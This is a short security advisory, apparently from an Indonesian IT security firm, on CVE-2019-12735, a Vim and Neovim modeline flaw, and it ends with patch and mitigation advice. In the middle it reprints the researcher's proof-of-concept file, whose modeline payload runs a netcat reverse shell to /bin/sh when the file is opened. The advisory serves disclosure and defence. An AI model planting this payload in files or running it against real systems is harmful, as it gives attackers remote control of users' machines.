For businesses that have adopted a Linux-based operating system (OS), the term ‘Vim’ and ‘Neovim’ is no longer a foreign concept. It is the two most popular command-line text editing applications that come pre-installed with the majority of Linux-based operating systems. However, both applications have been found to have a critical flaw that could get your systems hacked by simply opening a text file in these applications.
This flaw was first discovered by a security researcher named Armin Razmjou. He found that Vim and Neovim before the versions of 8.1.1365 and 0.3.6, respectively are vulnerable to arbitrary code execution via modelines by opening a specially crafted text file. The vulnerability is known as CVE-2019-12735.
The modeline feature allows users to specify custom editor options near the start or end of a file. For security reasons, only a subset of options is permitted in modelines, and if the option value contains an unsafe expression, the program will be run in a virtual isolated environment called sandbox. However, the researcher found that the sandbox can still be bypassed with the “:source!” command. By bypassing the sandbox, attackers can gain control of your systems remotely. Thus, it is crucial to beware of the files that you opened in Vim and Neovim.
Armin demonstrated a real-life attack approach in which a reverse shell is launched once the user opens the file. The file sent by attackers will be similar to the file below:
root@test: ~# cat shell.txt
**Opening File**
x1b[?7lx1bSNothing here.x1b:silent! w | call system(‘nohup nc 127.0.0.1 9999 -e /bin/sh &’) | redraw! | file | silent! # ” vim: set fen fdm=expr fde=assert_fails(‘set fde=x | source! %’) fdl=0: x16x1b[1Gx16x1b[KNothing here.”x16x1b[D n
**End of File**
After you opened the file above, the attacker will de-escalate your privileges and execute an attack to gain control of your systems, as seen in the GIF below:
To prevent such attacks from happening, you have to install both applications with the latest updates, namely Vim patch 8.1.1365 and Neovim patch that was released in v0.36. Additionally, there are three tips from Armin that users should do to minimize the possibility of getting an attack:
- Disable modelines feature.
- Disable “modelineexpr” to disallow expressions in modelines.
- Use “securemodelines plugin,” a secure alternative to Vim modelines.
As one of the IT security experts in Indonesia, Defender Nusa Semesta (DNS) hopes that this article informs, alerts and prepares you to solve the flaw of CVE-2019-12735 and be safe from attacks.
